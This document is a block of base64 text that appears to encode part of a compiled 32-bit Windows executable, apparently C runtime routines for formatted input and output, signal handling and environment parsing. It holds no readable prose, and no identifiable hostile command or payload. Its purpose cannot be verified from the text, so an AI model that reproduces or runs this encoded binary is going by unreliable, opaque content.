AWVmDvUD+//8AD4S0CQAAgL16/v//AA+FRfz//4uFRP7//42N/P3///+FMP7//1GLjUj+//9QxgQGAA++hWb+//9RSFD/NeDMBRD/FTxSAxD/0IPEEOkH/P//hdJ1EUfHhTj+//8BAAAAib1s/v//ioV7/v//hMB+B8aFZ/7//wGLjXD+//+LtUj+//9JiY1w/v//iY1g/v//g/v/dBT/tXT+//9T6M9uAABZWYuNcP7//4u9WP7//4P/Y3QG/40s/v//g704/v//AHQXi5Vs/v//i8JKiZVs/v//hcAPhAMEAAD/tXT+//9BiY1w/v//iY1g/v//6HT2//+L2ImdXP7//1mD+/8PhLMDAACD/2N0RoP/c3UTg/sJfAmD+w0PjpsDAACD+yB1LoP/ew+FjQMAADPSi8PB+AOLy4PhB0LT4g++TAXcD76FV/7//zPIhdEPhGgDAACAvXr+//8AD4VPAwAAi4Us/v//hcAPhAAIAACAvWf+//8AD4QcAwAAD7bDUIidHP7//+ggJwAAWYXAdCWLhXD+////tXT+//9AiYVw/v//iYVg/v//6L31//9ZiIUd/v//jYX8/f//x4UQ/v//PwAAAFCLhfz9////cHSNhRz+//9QjYUQ/v//UOiNVAAAi5VI/v//g8QQZouFEP7//2aJAoPCAv+NLP7//4mVSP7//+moAgAAi8GD6HAPhBkDAACD6AMPhE7+//9ISA+EDwMAAIPoAw+EXvr//4PoA3Q3i71o/v//D7YHO8MPhQwHAACKhXn+///+yIC9ev7//wAPhRD6//+LlRT+//+JlRj+///p//n//4qFe/7//4TAfgfGhWf+//8Bi7Vo/v//RoA+XnUIRsaFV/7///9qII1F3GoAUOi0FgAAg8QMgD5ddQmyXcZF5yBG6waKlU/+//+KDoD5XQ+ElAAAAEaA+S11XoTSdFqKBjxddFRGibVo/v//OtBzBIrg6wSK4orQOtRzJorED7byKsIPtviL1ovOweoDg+EHsAHS4AhEFdxGT3Xqi7Vo/v//D7bMsAGL0YPhB8HqA9LgCEQV3DLS6x+IjU/+//+wAQ+2yYvRg+EHweoD0uAIRBXcipVP/v//ig6A+V0PhXL///+LnVz+//+APgAPhGQGAACJtWj+///pFv3//4P7K3U/i71s/v//T4m9bP7//3UNhdJ0CcaFeP7//wHrKf+1dP7//0aJtXD+//+JtWD+///ozPP//4vYWYmdXP7//+sGi71s/v//g/swD4XAAQAA/7V0/v//Rom1cP7//4m1YP7//+ia8///i9iJnVz+//9ZgPt4dHSA+1h0b4uNWP7//8eFQP7//wEAAACD+Xh0JoO9OP7//wB0D0+JvWz+//91Bv6FeP7//2pvWYmNWP7//+lgAQAATom1cP7//4m1YP7//4P7/3QU/7V0/v//U+g4awAAWVmLjVj+//9qMFuJnVz+///pLAEAAP+1dP7//0aJtXD+//+JtWD+///oAPP//4O9OP7//wCL2FmJnVz+//90FIPvAom9bP7//4P/AX0G/oV4/v//anjpe////4uNSP7//4gZQUiJjUj+//+JhSz+///rAUaLjXD+///pA/z//4uFcP7//0iJhXD+//+JhWD+//+D+/90Dv+1dP7//1PolWoAAFlZi4VI/v//O/APhM8EAACAvXr+//8AD4Vg9////4Uw/v//g/9jD4RR9///gL1n/v//AIu9aP7//3QKM8lmiQjpPvf//8YAAOk29///xoVm/v//AYP7LXUJxoVW/v//AesFg/srdThPib1s/v//dQiF0nQEsAHrLf+1dP7//0aJtXD+//+JtWD+///o+/H//4vYWYmdXP7//4uNWP7//4qFeP7//4O9JP7//wAPhHwBAACEwA+FPQEAAIP5eHRng/lwdGIPtsNQ6JdkAACLvVj+//9ZhcAPhPkAAACD/291JIP7OA+N6wAAAIuFUP7//4uNPP7//w+kyAOJhVD+///B4QPrbYuVUP7//2oAagpSi5U8/v//UugkaAAAi8iJlVD+///rTA+2w1Doi2QAAFmFwA+ElwAAAIuFPP7//4uNUP7//w+kwQRTweAEiY1Q/v//iYU8/v//6A3x//+LvVj+//+L2FmLjTz+//+JnVz+////hUD+//+NQ9CZA8iLhVD+//+JjTz+//8TwoO9OP7//wCJhVD+//90CP+NbP7//3Rm/7V0/v//Rom1cP7//4m1YP7//+jQ8P//WYuNWP7//4vYiZ1c/v//6ev+//+LvVj+//9OibVw/v//ibVg/v//g/v/dBb/tXT+//9T6KJoAABZWesGi71Y/v//i408/v//i4VQ/v//gL1W/v//AA+EJwEAAPfZiY08/v//g9AA99iJhVD+///pDwEAAITAD4XqAAAAg/l4dD+D+XB0Og+2w1DoG2MAAIu9WP7//1mFwA+EpgAAAIP/b3UUg/s4D42YAAAAi4U0/v//weAD6zlrhTT+//8K6zAPtsNQ6DdjAABZhcB0cMGlNP7//wRT6NXv//+LvVj+//+L2IuFNP7//1mJnVz+////hUD+//+DwNADw4O9OP7//wCJhTT+//90CP+NbP7//3Rg/7V0/v//Rom1cP7//4m1YP7//+in7///WYuNWP7//4vYiZ1c/v//6T7///+LvVj+//9OibVw/v//ibVg/v//g/v/dBb/tXT+//9T6HlnAABZWesGi71Y/v//i4U0/v//gL1W/v//AHQI99iJhTT+//+D70b33xv/I71A/v//D4SPAQAAgL16/v//AA+FIPT///+FMP7//4uFNP7//4O9JP7//wB0HIuFSP7//4uVPP7//4kQi5VQ/v//iVAE6e/z//+KjWb+//+LvWj+//+EyYuNSP7//3QHiQHp2PP//2aJAenQ8///OsF1BjhPAXUBR/+1dP7//0aJtXD+//+JtWD+///otu7//4vYD7YHR4mdXP7//4m9aP7//1k7ww+F3AAAAA+2w1Do0h8AAFmFwHQq/7V0/v//6ILu//9ZD7YPR4m9aP7//zvID4WTAAAAibVw/v//ibVg/v//g/v/dROAPyUPhakAAACAfwFuD4WfAAAAigeEwA+Fp+///+mQAAAAioV7/v//hMB+BzPAZokC6wPGAgDoT4r//8cADAAAAOtvg/v/dA7/tXT+//9T6BRmAABZWceFDP7//wEAAADrUOgjiv//gL1n/v//AMcADAAAAHQHM8BmiQbrNcYGAOswi710/v//g87/O8Z0CVdQ6NJlAABZWTvedBZX6wuD+/90Dv+1dP7//1PouGUAAFlZg70o/v//AXUM/7VE/v//6B1n//9Zg8j/O9h1FIuNMP7//4XJdTE4jXn+//90K+sng70M/v//AXUY6JqJ///HABYAAADokob//4uFMP7//+sIi40w/v//i8GAvQj+//8AdAqLjQT+//+DYXD9XotN/F8zzVvoBQ8AAIvlXcNVi+xTVot1CP91DP8G6B3t//+L2FmD+/90Dg+2y1HoEGAAAFmFwHXgXovDW13DVle+fJkFEL98mQUQ6wuLBoXAdAL/0IPGBDv3cvFfXsNWV76EmQUQv4SZBRDrC4sGhcB0Av/Qg8YEO/dy8V9ew1WL7KEA+AUQMwVwzAUQdAf/dQj/0F3DXf8luFEDEFWL7KEE+AUQMwVwzAUQ/3UIdAT/0F3D/xWsUQMQXcNVi+yhCPgFEDMFcMwFEP91CHQE/9Bdw/8VtFEDEF3DVYvsoQz4BRAzBXDMBRD/dQz/dQh0BP/QXcP/FThSAxBdw1WL7KEQ+AUQMwVwzAUQdA3/dRD/dQz/dQj/0F3D/3UM/3UI/xXAUQMQM8BAXcNVi+xRVos1wMwFEIX2eSWhdPgFEDP2MwVwzAUQiXX8dA1WjU38Uf/Qg/h6dQFGiTXAzAUQM8CF9l4Pn8CL5V3DVldodPYEEP8VdFIDEIs1eFIDEIv4aCRkAxBX/9YzBXDMBRBoMGQDEFejAPgFEP/WMwVwzAUQaDhkAxBXowT4BRD/1jMFcMwFEGhEZAMQV6MI+AUQ/9YzBXDMBRBoUGQDEFejDPgFEP/WMwVwzAUQaGxkAxBXoxD4BRD/1jMFcMwFEGh8ZAMQV6MU+AUQ/9YzBXDMBRBokGQDEFejGPgFEP/WMwVwzAUQaKhkAxBXoxz4BRD/1jMFcMwFEGjAZAMQV6Mg+AUQ/9YzBXDMBRBo1GQDEFejJPgFEP/WMwVwzAUQaPRkAxBXoyj4BRD/1jMFcMwFEGgMZQMQV6Ms+AUQ/9YzBXDMBRBoJGUDEFejMPgFEP/WMwVwzAUQaDhlAxBXozT4BRD/1jMFcMwFEKM4+AUQaExlAxBX/9YzBXDMBRBoaGUDEFejPPgFEP/WMwVwzAUQaIhlAxBXo0D4BRD/1jMFcMwFEGikZQMQV6NE+AUQ/9YzBXDMBRBoxGUDEFejSPgFEP/WMwVwzAUQaNhlAxBXo0z4BRD/1jMFcMwFEGj0ZQMQV6NQ+AUQ/9YzBXDMBRBoCGYDEFejWPgFEP/WMwVwzAUQaBhmAxBXo1T4BRD/1jMFcMwFEGgoZgMQV6Nc+AUQ/9YzBXDMBRBoOGYDEFejYPgFEP/WMwVwzAUQaEhmAxBXo2T4BRD/1jMFcMwFEGhkZgMQV6No+AUQ/9YzBXDMBRBoeGYDEFejbPgFEP/WMwVwzAUQaIhmAxBXo3D4BRD/1jMFcMwFEGicZgMQV6N0+AUQ/9YzBXDMBRCjePgFEGisZgMQV//WMwVwzAUQaMxmAxBXo3z4BRD/1jMFcMwFEF+jgPgFEF7DVYvs/3UI/xXMUgMQXcNVi+z/dQj/FQRTAxBQ/xW8UQMQXcNVi+xqAP8VxFEDEP91CP8VyFEDEF3DzMzMzMzMVYvsi0UIM9JTVleLSDwDyA+3QRQPt1kGg8AYA8GF23Qbi30Mi3AMO/5yCYtICAPOO/lyCkKDwCg703LoM8BfXltdw8zMzMzMzMzMzMzMzMxVi+xq/mjInAUQaHBGAhBkoQAAAABQg+wIU1ZXoXDMBRAxRfgzxVCNRfBkowAAAACJZejHRfwAAAAAaAAAABDofAAAAIPEBIXAdFSLRQgtAAAAEFBoAAAAEOhS////g8QIhcB0OotAJMHoH/fQg+ABx0X8/v///4tN8GSJDQAAAABZX15bi+Vdw4tF7IsAM8mBOAUAAMAPlMGLwcOLZejHRfz+////M8CLTfBkiQ0AAAAAWV9eW4vlXcPMzMzMzMxVi+yLRQi5TVoAAGY5CHQEM8Bdw4tIPAPIM8CBOVBFAAB1DLoLAQAAZjlRGA+UwF3DVmoEaiDoRbH//1lZi/BW/xVAUgMQo5j4BRCjlPgFEIX2dQVqGFhew4MmADPAXsNqDGjonAUQ6ASt//+DZeQA6E97//+DZfwA/3UI6CMAAABZi/CJdeTHRfz+////6AsAAACLxugbrf//w4t15Ogqe///w1WL7FFTVos1PFIDEFf/NZj4BRD/1v81lPgFEIlF/P/Wi9iLRfw72A+CggAAAIv7K/iNTwSD+QRydlDocmAAAIvwjUcEWTvwc0e4AAgAADvwcwKLxotd/APGO8ZyDVBT6Aex//9ZWYXAdRSNRhA7xnI+UFPo87D//1lZhcB0McH/AlCNHLj/FUBSAxCjmPgFEP91CP8VQFIDEI1LBIkDUf8VQFIDEKOU+AUQi0UI6wIzwF9eW4vlXcNVi+z/dQjo+f7///fYWRvA99hIXcNWM/b/tsTMBRD/FUBSAxCJhsTMBRCDxgSD/ihy5l7DaghoCJ0FEOjUq///6LaP//+LQHiFwHQWg2X8AP/Q6wczwEDDi2Xox0X8/v///+jMXwAAzGgwmgIQ/xVAUgMQo7TxBRDDVYvsi0UIo7jxBRBdw/81xPEFEP8VPFIDEMNVi+yLRQijvPEFEKPA8QUQo8TxBRCjyPEFEF3DaiRoKJ0FEOhZq///g2XUAINl0AAz24ld4DP/iX3Yi3UIg/4Lf1B0FYvGagJZK8F0IivBdAgrwXReK8F1SOgij///i/iJfdiF/3UWg8j/6WIBAADHReS88QUQobzxBRDrXv93XFboUQEAAFlZg8AIiUXkiwDrVovGg+gPdDaD6AZ0I0h0EuiSgf//xwAWAAAA6Ip+///rtMdF5MTxBRChxPEFEOsax0XkwPEFEKHA8QUQ6wzHReTI8QUQocjxBRAz20OJXeBQ/xU8UgMQiUXcg/gBD4TbAAAAhcB1B2oD6DJ4//+F23QIagDoCK3//1mDZfwAg/4IdAqD/gt0BYP+BHUci0dgiUXUg2dgAIP+CHU/i0dkiUXQx0dkjAAAAIP+CHUtiw2AZwMQi9GJVcyhhGcDEAPBO9B9JGvKDItHXINkCAgAQolVzIsNgGcDEOveagD/FUBSAxCLTeSJAcdF/P7////oGAAAAIP+CHUg/3dkVv9V3FnrGot1CItd4It92IXbdAhqAOjUrf//WcNW/1XcWYP+CHQKg/4LdAWD/gR1EYtF1IlHYIP+CHUGi0XQiUdkM8Do8Kn//8NVi+yLVQyLDXhnAxBWi3UIOXIEdA1rwQyDwgwDRQw70HLua8kMA00MO9FzCTlyBHUEi8LrAjPAXl3DVYvsi0UIo9DxBRBdw1WL7FboWY3//4vwhfYPhEUBAACLVlyLyleLfQg5OXQNg8EMjYKQAAAAO8hy742CkAAAADvIcwQ5OXQCM8mFyQ+EEAEAAItRCIXSD4QFAQAAg/oFdQyDYQgAM8BA6fYAAACD+gF1CIPI/+npAAAAi0UMU4teYIlGYIN5BAgPhcAAAABqJF+LRlyDZAcIAIPHDIH/kAAAAHztgTmOAADAi35kdQzHRmSDAAAA6YYAAACBOZAAAMB1CcdGZIEAAADrdYE5kQAAwHUJx0ZkhAAAAOtkgTmTAADAdQnHRmSFAAAA61OBOY0AAMB1CcdGZIIAAADrQoE5jwAAwHUJx0ZkhgAAAOsxgTmSAADAdQnHRmSKAAAA6yCBObUCAMB1CcdGZI0AAADrD4E5tAIAwHUHx0ZkjgAAAP92ZGoI/9JZiX5k6wn/cQSDYQgA/9JZiV5gg8j/W+sCM8BfXl3DVYvsuGNzbeA5RQh1Df91DFDoj/7//1lZXcMzwF3DVYvsUVGDPZz4BRAAdQXosoL//1NWV2gEAQAAv9jxBRAz21dTiB3c8gUQ/xWkUQMQizWM+AUQiT286AUQhfZ0BDgedQKL941F+FCNRfxQU1NW6F0AAACLXfyDxBSB+////z9zRYtN+IP5/3M9jRSZO9FyNlLoyav//4v4WYX/dCmNRfhQjUX8UI0En1BXVuggAAAAi0X8g8QUSIk9rOgFEKOo6AUQM8DrA4PI/19eW4vlXcNVi+yLRRRTi10YVot1CFeDIwCLfRDHAAEAAACLRQyFwHQIiTiDwASJRQwzyYlNCIA+InURM8CFyQ+UwEaLyLAiiU0I6zX/A4X/dAWKBogHR4oGRohFGw+2wFDolFsAAFmFwHQM/wOF/3QFigaIB0dGikUbhMB0GYtNCIXJdbE8IHQEPAl1qYX/dAfGR/8A6wFOg2UYAIA+AA+EygAAAIoGPCB0BDwJdQNG6/OAPgAPhLQAAACLVQyF0nQIiTqDwgSJVQyLRRT/ADPSQjPJ6wJGQYA+XHT5gD4idTP2wQF1H4N9GAB0DI1GAYA4InUEi/DrDTPAM9I5RRgPlMCJRRjR6esLSYX/dATGB1xH/wOFyXXxigaEwHRBOU0YdQg8IHQ4PAl0NIXSdCoPvsBQ6MFaAABZhf90E4XAdAiKBogHR0b/A4oGiAdH6weFwHQDRv8D/wNG6W////+F/3QExgcAR/8D6S3///+LVQxfXluF0nQDgyIAi0UU/wBdw4M9nPgFEAB1BeiIgP//Vos13OgFEFcz/4X2dReDyP/plgAAADw9dAFHVugM3///RlkD8IoGhMB1641HAWoEUOiHqf//i/iJPbToBRBZWYX/dMqLNdzoBRBTgD4AdD5W6Nfe//+APj1ZjVgBdCJqAVPoVqn//4kHWVmFwHRAVlNQ6AhaAACDxAyFwHVIg8cEA/OAPgB1yIs13OgFEFboKVn//4Ml3OgFEACDJwAzwMcFoPgFEAEAAABZW19ew/81tOgFEOgDWf//gyW06AUQAIPI/+vkM8BQUFBQUOileP//zFWL7IPsFINl9ACDZfgAoXDMBRBWV79O5kC7vgAA//87x3QNhcZ0CffQo3TMBRDrZo1F9FD/FYRSAxCLRfgzRfSJRfz/FQxSAxAxRfz/FVRSAxAxRfyNRexQ/xWgUQMQi03wjUX8M03sM038M8g7z3UHuU/mQLvrEIXOdQyLwQ0RRwAAweAQC8iJDXDMBRD30YkNdMwFEF9ei+VdwzPAQMIMAFWL7FFX/xWcUQMQi/gzwIX/dHVWi/dmOQd0EIPGAmY5BnX4g8YCZjkGdfBTUFBQK/dQ0f5GVldQUP8VFFIDEIlF/IXAdDdQ6ESo//+L2FmF23QqM8BQUP91/FNWV1BQ/xUUUgMQhcB1CVPo2Vf//1kz21f/FZhRAxCLw+sJV/8VmFEDEDPAW15fi+Vdw4Ml4PcFEADDOw1wzAUQdQLzw+mTGgAAzMzMzItUJAyLTCQEhdJ0fw+2RCQID7oleOsFEAFzDYtMJAxXi3wkCPOq612LVCQMgfqAAAAAfA4PuiW4zAUQAQ+CdVgAAFeL+YP6BHIx99mD4QN0DCvRiAeDxwGD6QF19ovIweAIA8GLyMHgEAPBi8qD4gPB6QJ0BvOrhdJ0CogHg8cBg+oBdfaLRCQIX8OLRCQEw1WL7ItNCIP5/nUN6Kd5///HAAkAAADrOIXJeCQ7DYT4BRBzHIvBg+EfwfgFweEGiwSFcOoFEA++RAgEg+BAXcPocnn//8cACQAAAOhqdv//M8Bdw2oYaEidBRDooKL//4PO/4l12Il13It9CIP//nUY6A15//+DIADoOXn//8cACQAAAOm9AAAAhf8PiJ0AAAA7PYT4BRAPg5EAAACLx8H4BYlF5Ivfg+MfweMGiwSFcOoFEA++RBgEg+ABdHBX6M62//9Zg2X8AItF5IsEhXDqBRD2RBgEAXQY/3UU/3UQ/3UMV+hnAAAAg8QQi/CL2usV6MB4///HAAkAAADogXj//4MgAIveiXXYiV3cx0X8/v///+gNAAAAi9PrK4t9CItd3It12FfoDLr//1nD6FB4//+DIADofHj//8cACQAAAOh0df//i9aLxuj2of//w1WL7FFRVot1CFdW6O+4//+Dz/9ZO8d1EehKeP//xwAJAAAAi8eL1+tE/3UUjU34Uf91EP91DFD/FZRRAxCFwHUP/xXYUgMQUOj5d///WevTi8aD5h/B+AXB5gaLBIVw6gUQgGQwBP2LRfiLVfxfXovlXcNVi+z/BaDoBRBWvgAQAABW6ICl//9Zi00IiUEIhcB0CYNJDAiJcRjrEYNJDASNQRSJQQjHQRgCAAAAi0EIg2EEAIkBXl3DVYvsgeyAAgAAoXDMBRAzxYlF/ItFCI2NkP3//1NWiYXQ/f//i0UMV/91EIt9FImF8P3//zPAi9iJveT9//+Jhaz9//+L8Imd6P3//4mFwP3//4mF3P3//4mFzP3//4mFsP3//4mFuP3//4mFvP3//+gdVf//6DR3//+JhaT9//+LhdD9//+FwA+EsgoAAPZADEB1Y1Dor17//1mLyIP5/3QZg/n+dBSL0cH4BYPiH8HiBgMUhXDqBRDrBbp4zAUQ9kIkfw+FdgoAAIP5/3QZg/n+dBSLwYPhH8H4BcHhBgMMhXDqBRDrBbl4zAUQ9kEkgA+FSQoAAIuV8P3//4XSD4Q7CgAAihIzwImF2P3//4vIiY3g/f//iYXI/f//iYWo/f//iJXv/f//iJW0/f//hNIPhB4KAACLhfD9//9AiYXw/f//hckPiOUJAACNQuA8WHcPD77CD7aAaGcDEIPgD+sCM8CLvcj9//9rwAkPtrw4iGcDEIvHib3I/f//i73k/f//wegEiYXI/f//g/gID4SrCQAAg/gHD4d3CQAA/ySFlbACEDPAg43c/f///4vYiYWw/f//iYW4/f//iYXA/f//iYXM/f//iZ3o/f//iYW8/f//6TwJAAAPvsKD6CB0RoPoA3Q5g+gIdC9ISHQdg+gDi4Xw/f//D4UdCQAAg8sIiZ3o/f//6Q8JAACDywSJnej9///p+wgAAIPLAevwgcuAAAAA6+iDywLr44D6KnUviweDxwSJveT9//+JhcD9//+FwA+JywgAAIPLBPfYiZ3o/f//iYXA/f//6bUIAABrjcD9//8KD77Cg8HQA8GJhcD9///plQgAADPAiYXc/f//6Y4IAACA+ip1K4sHg8cEiYXc/f//hcCLhfD9//+JveT9//8PiXAIAACDjdz9////6WQIAABrjdz9//8KD77Cg8HQA8GJhdz9///pPggAAID6SXRFgPpodDiLhfD9//+A+mx0FID6dw+FLAgAAIHLAAgAAOkH////gDhsdQxAgcsAEAAA6fb+//+DyxDp7v7//4PLIOn0/v//i4Xw/f//igA8NnUci73w/f//gH8BNHUQi8eDwAKBywCAAADpvv7//zwzdRyLvfD9//+AfwEydRCLx4PAAoHj/3///+me/v//PGQPhKoHAAA8aQ+EogcAADxvD4SaBwAAPHUPhJIHAAA8eA+EigcAADxYD4SCBwAAM8CJhcj9///rAjPAiYW8/f//jYWQ/f//UA+2wlDo0wgAAFlZhcB0OI2F4P3//1D/tdD9////tbT9///oyQcAAIuN8P3//4PEDIoBQYiFtP3//4mN8P3//4TAD4RNBwAAjYXg/f//UP+10P3///+1tP3//+iRBwAAg8QM6fwGAAAPvsKD+GQPj80BAAAPhFECAACD+FMPj+0AAAB0fIPoQXQQSEh0VkhIdAhISA+FGAUAAIDCIMeFsP3//wEAAACIle/9//+Lhdz9//+NtfT9//+Dy0C5AAIAAImd6P3//4mNxP3//4XAD4kyAgAAx4Xc/f//BgAAAOmAAgAA98MwCAAAD4WeAAAAgcsACAAAiZ3o/f//6Y0AAAD3wzAIAAB1DIHLAAgAAImd6P3//4uV3P3//7n///9/g/r/dAKLyos3g8cEib3k/f//98MQCAAAD4RTBAAAhfZ1Bos1hMIFEMeFvP3//wEAAACLxoXJdA8z0klmORB0B4PAAoXJdfMrxtH46TwEAACD6FgPhLACAABISHRwg+gHD4Qn////SEgPhSQEAACDxwSJveT9///3wxAIAAB0MA+3R/xQaAACAACNhfT9//9QjYXY/f//UOilCAAAg8QQhcB0H8eFuP3//wEAAADrE4pH/IiF9P3//8eF2P3//wEAAACNtfT9///pxQMAAIsHg8cEib3k/f//hcB0M4twBIX2dCwPvwD3wwAIAAB0FJkrwseFvP3//wEAAADR+OmKAwAAM8mJjbz9///pfQMAAIs1gMIFEFbokdT//1npawMAAIP4cA+P4wEAAA+EzwEAAIP4ZQ+MWQMAAIP4Zw+OS/7//4P4aXRkg/hudCWD+G8PhT0DAADHhdj9//8IAAAAhNt5W4HLAAIAAImd6P3//+tNg8cEib3k/f//i3/86IYGAACFwA+E6wQAAIuF4P3///bDIHQFZokH6wKJB8eFuP3//wEAAADpegQAAIPLQImd6P3//8eF2P3//woAAAD3wwCAAAB1DPfDABAAAA+EjgEAAIsPg8cIib3k/f//M/aLf/zprgEAAHURgPpndVbHhdz9//8BAAAA60o7wX4Ii8GJhdz9//89owAAAH43jbhdAQAAV+hrnv//ipXv/f//iYWo/f//WYXAdAqL8Im9xP3//+sKx4Xc/f//owAAAIu95P3//4sHg8cIiYWA/f//ib3k/f//i0f8iYWE/f//jYWQ/f//UP+1sP3//w++wv+13P3//1D/tcT9//+NhYD9//9WUP813MwFEP8VPFIDEP/Qi/uDxByB54AAAAB0IYO93P3//wB1GI2FkP3//1BW/zXozAUQ/xU8UgMQ/9BZWYC97/3//2d1HIX/dRiNhZD9//9QVv815MwFEP8VPFIDEP/QWVmAPi0PhSj+//+BywABAABGiZ3o/f//6Rb+///Hhdz9//8IAAAAagfrHIPocw+E3/z//0hID4SW/v//g+gDD4VrAQAAaifHhdj9//8QAAAAWImFrP3//4TbD4l8/v//BFHGhdT9//8wiIXV/f//x4XM/f//AgAAAOle/v//g8cEM/aJveT9///2wyB0EfbDQHQGD79H/OsOD7dH/OsI9sNAdAqLR/yZi8iL+usFi0/8i/72w0B0HDv+fxh8BDvOcxL32RP+99+BywABAACJnej9///3wwCQAAB1Aov+i5Xc/f//hdJ5BTPSQusUg+P3uAACAACJnej9//870H4Ci9CLwQvHdQaJtcz9//+NdfOLwkqJldz9//+FwH8Gi8ELx3Q9i4XY/f//mVJQV1HoRwUAAIPBMImdjP3//4mFxP3//4v6g/k5fgYDjaz9//+Lldz9//+IDk6LjcT9///rsIud6P3//41F8yvGRomF2P3///fDAAIAAHQ2hcB0BYA+MHQtTv+F2P3//8YGMOshhfZ1Bos1gMIFEIvG6wdJgDgAdAVAhcl19SvGiYXY/f//g724/f//AA+FhgEAAPbDQHQ198MAAQAAdAnGhdT9//8t6xr2wwF0CcaF1P3//yvrDPbDAnQRxoXU/f//IMeFzP3//wEAAACLvcD9//8rvdj9//+Lhcz9//8r+PbDDHUejYXg/f//UP+10P3//1dqIOgSAgAAi4XM/f//g8QQ/7Wk/f//jY3g/f//Uf+10P3//1CNhdT9//9Q6BUCAACDxBT2wwh0HfbDBHUYjYXg/f//UP+10P3//1dqMOjHAQAAg8QQg728/f//AIuF2P3//3R9hcB+eYvOSImFxP3//w+3AYPBAlBqBo1F9ImNjP3//1CNhaD9//9Q6LEDAACDxBCFwHU/OYWg/f//dDf/taT9//+NheD9//9Q/7XQ/f//jUX0/7Wg/f//UOiEAQAAi4XE/f//g8QUi42M/f//hcB1lusog8n/iY3g/f//6yP/taT9//+NjeD9//9R/7XQ/f/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AAADoOUP///+2jAAAAOguQ////7aQAAAA6CND////tpQAAADoGEP///+2mAAAAOgNQ////7acAAAA6AJD////tqAAAADo90L///+2pAAAAOjsQv///7aoAAAA6OFC////trgAAADo1kL///+2vAAAAOjLQv///7bAAAAA6MBC////tsQAAADotUL///+2yAAAAOiqQv//g8RA/7bMAAAA6JxC////trQAAADokUL///+21AAAAOiGQv///7bYAAAA6HtC////ttwAAADocEL///+24AAAAOhlQv///7bkAAAA6FpC////tugAAADoT0L///+20AAAAOhEQv///7bsAAAA6DlC////tvAAAADoLkL///+29AAAAOgjQv///7b4AAAA6BhC////tvwAAADoDUL///+2AAEAAOgCQv///7YEAQAA6PdB//+DxED/tggBAADo6UH///+2DAEAAOjeQf///7YQAQAA6NNB////thQBAADoyEH///+2GAEAAOi9Qf///7YcAQAA6LJB////tiABAADop0H///+2JAEAAOicQf///7YoAQAA6JFB////tiwBAADohkH///+2MAEAAOh7Qf///7Y0AQAA6HBB////tjgBAADoZUH///+2PAEAAOhaQf///7ZAAQAA6E9B////tkQBAADoREH//4PEQP+2SAEAAOg2Qf//